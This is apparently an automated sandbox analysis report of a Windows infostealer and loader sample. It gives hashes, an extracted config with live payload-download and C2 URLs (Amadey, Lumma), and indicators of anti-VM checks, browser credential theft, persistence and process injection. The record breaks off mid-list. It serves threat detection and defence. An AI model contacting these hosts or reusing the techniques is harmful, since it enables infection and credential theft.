Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
07/04/2025, 11:28
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
e408c7ab87d92c48a31d80255f3d7173
-
SHA1
b786588fa8eda9761af63f013a605084c8e5e116
-
SHA256
b4e06c1fe25b151ba0823bcda149fee5eab22b6c2e62015917417742c9b93395
-
SHA512
cf2fe46fe507aa4a6d0c0b325bb28200c44b2742879d1d460fc38b73e5209fcddc178732f97ed6390cd0c653054166193d161c908e6723b8013dba378f7a2b99
-
SSDEEP
24576:bqDEvCTbMWu7rQYlBQcBiT6rprG8a0+u:bTvC/MTQYxsWR7a0+
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://advennture.top/GKsiio
https://atargett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
Signatures
-
Amadey family
-
Asyncrat family
-
Lumma family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/3376-618-0x0000000000400000-0x000000000073A000-memory.dmp family_stormkitty -
Stormkitty family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ff7091b049.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 18 2032 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2032 powershell.exe -
Downloads MZ/PE file 11 IoCs
flow pid Process 131 2412 MSBuild.exe 236 2412 MSBuild.exe 261 2412 MSBuild.exe 291 2412 MSBuild.exe 305 2412 MSBuild.exe 18 2032 powershell.exe 128 2412 MSBuild.exe 165 2412 MSBuild.exe 243 2412 MSBuild.exe 39 3916 rapes.exe 120 2412 MSBuild.exe -
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4804 chrome.exe 4300 chrome.exe 3464 chrome.exe 1740 msedge.exe 4728 chrome.exe 708 chrome.exe 6060 msedge.exe 5696 msedge.exe 5700 msedge.exe 3204 msedge.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ff7091b049.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ff7091b049.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation rapes.exe -
Executes dropped EXE 23 IoCs
pid Process 972 TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE 3916 rapes.exe 4312 ibC8xs1.exe 4936 exp.exe 4908 rapes.exe 3748 DgQBvwg.exe 2464 exp.exe 5336 steamerrorreporter.exe 5484 steamerrorreporter.exe 5216 Clickthis.exe 5000 444.exe 2112 X3vNPr9.exe 788 Nehh6wZ.exe 2536 rapes.exe 2632 2edfcc2a37.exe 2832 ff7091b049.exe 5360 Nehh6wZ.exe 5640 qhjMWht.exe 2936 Rm3cVPI.exe 4780 AfkeY2q.exe 4268 steamerrorreporter.exe 1440 steamerrorreporter.exe 976 9sWdA2p.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine ff7091b049.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine rapes.exe -
Loads dropped DLL 10 IoCs
pid Process 5336 steamerrorreporter.exe 5336 steamerrorreporter.exe 5484 steamerrorreporter.exe 5484 steamerrorreporter.exe 5000 444.exe 4980 remoteBggbv2.exe 4268 steamerrorreporter.exe 4268 steamerrorreporter.exe 1440 steamerrorreporter.exe 1440 steamerrorreporter.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts MSBuild.exe -
Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook MSBuild.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe" ibC8xs1.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe" DgQBvwg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 271 raw.githubusercontent.com 272 raw.githubusercontent.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 972 TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE 3916 rapes.exe 4908 rapes.exe 2536 rapes.exe 2832 ff7091b049.exe -
Suspicious use of SetThreadContext 25 IoCs
description pid Process procid_target PID 4312 set thread context of 2412 4312 ibC8xs1.exe 112 PID 4936 set thread context of 4920 4936 exp.exe 127 PID 2412 set thread context of 1376 2412 MSBuild.exe 133 PID 3748 set thread context of 4716 3748 DgQBvwg.exe 138 PID 2412 set thread context of 3740 2412 MSBuild.exe 144 PID 2412 set thread context of 5752 2412 MSBuild.exe 167 PID 2412 set thread context of 6040 2412 MSBuild.exe 180 PID 2412 set thread context of 5688 2412 MSBuild.exe 182 PID 5000 set thread context of 3376 5000 444.exe 186 PID 2412 set thread context of 5260 2412 MSBuild.exe 188 PID 2112 set thread context of 5804 2112 X3vNPr9.exe 192 PID 2412 set thread context of 5740 2412 MSBuild.exe 194 PID 788 set thread context of 5672 788 Nehh6wZ.exe 199 PID 2412 set thread context of 3340 2412 MSBuild.exe 200 PID 5484 set thread context of 5528 5484 steamerrorreporter.exe 195 PID 2412 set thread context of 2200 2412 MSBuild.exe 204 PID 2412 set thread context of 5720 2412 MSBuild.exe 206 PID 5360 set thread context of 5628 5360 Nehh6wZ.exe 208 PID 2412 set thread context of 4488 2412 MSBuild.exe 209 PID 2412 set thread context of 5456 2412 MSBuild.exe 210 PID 2412 set thread context of 2436 2412 MSBuild.exe 211 PID 2412 set thread context of 5284 2412 MSBuild.exe 214 PID 4780 set thread context of 5240 4780 AfkeY2q.exe 216 PID 2412 set thread context of 5812 2412 MSBuild.exe 217 PID 2412 set thread context of 396 2412 MSBuild.exe 221 -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe MSBuild.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE File created C:\Windows\Installer\e587896.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI79AF.tmp msiexec.exe File created C:\Windows\Installer\e58789a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIB3B7.tmp msiexec.exe File opened for modification C:\Windows\Installer\e587896.msi msiexec.exe File created C:\Windows\Installer\SourceHash{21A523FF-B931-41F7-BDB8-D9653E221476} msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5492 3376 WerFault.exe 186 -
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qhjMWht.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9sWdA2p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language steamerrorreporter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language steamerrorreporter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ff7091b049.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language steamerrorreporter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AfkeY2q.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information MSBuild.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet MSBuild.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry class 17 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings rundll32.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2824 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2412 MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2032 powershell.exe 2032 powershell.exe 972 TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE 972 TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE 3916 rapes.exe 3916 rapes.exe 4908 rapes.exe 4908 rapes.exe 4936 exp.exe 4936 exp.exe 4936 exp.exe 4936 exp.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe 2412 MSBuild.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 5484 steamerrorreporter.exe 5484 steamerrorreporter.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 4728 chrome.exe 4728 chrome.exe 4728 chrome.exe 4728 chrome.exe 6060 msedge.exe 6060 msedge.exe 6060 msedge.exe 6060 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2032 powershell.exe Token: SeDebugPrivilege 4312 ibC8xs1.exe Token: SeDebugPrivilege 4936 exp.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 3748 DgQBvwg.exe Token: SeDebugPrivilege 2412 MSBuild.exe Token: SeDebugPrivilege 2464 exp.exe Token: SeShutdownPrivilege 4292 msiexec.exe Token: SeIncreaseQuotaPrivilege 4292 msiexec.exe Token: SeSecurityPrivilege 1988 msiexec.exe Token: SeCreateTokenPrivilege 4292 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4292 msiexec.exe Token: SeLockMemoryPrivilege 4292 msiexec.exe Token: SeIncreaseQuotaPrivilege 4292 msiexec.exe Token: SeMachineAccountPrivilege 4292 msiexec.exe Token: SeTcbPrivilege 4292 msiexec.exe Token: SeSecurityPrivilege 4292 msiexec.exe Token: SeTakeOwnershipPrivilege 4292 msiexec.exe Token: SeLoadDriverPrivilege 4292 msiexec.exe Token: SeSystemProfilePrivilege 4292 msiexec.exe Token: SeSystemtimePrivilege 4292 msiexec.exe Token: SeProfSingleProcessPrivilege 4292 msiexec.exe Token: SeIncBasePriorityPrivilege 4292 msiexec.exe Token: SeCreatePagefilePrivilege 4292 msiexec.exe Token: SeCreatePermanentPrivilege 4292 msiexec.exe Token: SeBackupPrivilege 4292 msiexec.exe Token: SeRestorePrivilege 4292 msiexec.exe Token: SeShutdownPrivilege 4292 msiexec.exe Token: SeDebugPrivilege 4292 msiexec.exe Token: SeAuditPrivilege 4292 msiexec.exe Token: SeSystemEnvironmentPrivilege 4292 msiexec.exe Token: SeChangeNotifyPrivilege 4292 msiexec.exe Token: SeRemoteShutdownPrivilege 4292 msiexec.exe Token: SeUndockPrivilege 4292 msiexec.exe Token: SeSyncAgentPrivilege 4292 msiexec.exe Token: SeEnableDelegationPrivilege 4292 msiexec.exe Token: SeManageVolumePrivilege 4292 msiexec.exe Token: SeImpersonatePrivilege 4292 msiexec.exe Token: SeCreateGlobalPrivilege 4292 msiexec.exe Token: SeRestorePrivilege 1988 msiexec.exe Token: SeTakeOwnershipPrivilege 1988 msiexec.exe Token: SeRestorePrivilege 1988 msiexec.exe Token: SeTakeOwnershipPrivilege 1988 msiexec.exe Token: SeShutdownPrivilege 4728 chrome.exe -
Suspicious use of FindShellTrayWindow 23 IoCs
pid Process 928 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 928 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 928 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1376 rundll32.exe 3740 rundll32.exe 2412 MSBuild.exe 4728 chrome.exe 5752 rundll32.exe 6060 msedge.exe 6060 msedge.exe 6040 rundll32.exe 5688 rundll32.exe 5260 rundll32.exe 5740 rundll32.exe 3340 rundll32.exe 2200 rundll32.exe 5720 rundll32.exe 4488 rundll32.exe 5456 rundll32.exe 2436 rundll32.exe 5284 rundll32.exe 5812 rundll32.exe 396 rundll32.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 928 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 928 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 928 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2412 MSBuild.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 928 wrote to memory of 1384 928 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 928 wrote to memory of 1384 928 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 928 wrote to memory of 1384 928 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 928 wrote to memory of 4280 928 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 928 wrote to memory of 4280 928 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 928 wrote to memory of 4280 928 2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 1384 wrote to memory of 2824 1384 cmd.exe 90 PID 1384 wrote to memory of 2824 1384 cmd.exe 90 PID 1384 wrote to memory of 2824 1384 cmd.exe 90 PID 4280 wrote to memory of 2032 4280 mshta.exe 92 PID 4280 wrote to memory of 2032 4280 mshta.exe 92 PID 4280 wrote to memory of 2032 4280 mshta.exe 92 PID 2032 wrote to memory of 972 2032 powershell.exe 102 PID 2032 wrote to memory of 972 2032 powershell.exe 102 PID 2032 wrote to memory of 972 2032 powershell.exe 102 PID 972 wrote to memory of 3916 972 TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE 104 PID 972 wrote to memory of 3916 972 TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE 104 PID 972 wrote to memory of 3916 972 TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE 104 PID 3916 wrote to memory of 4312 3916 rapes.exe 108 PID 3916 wrote to memory of 4312 3916 rapes.exe 108 PID 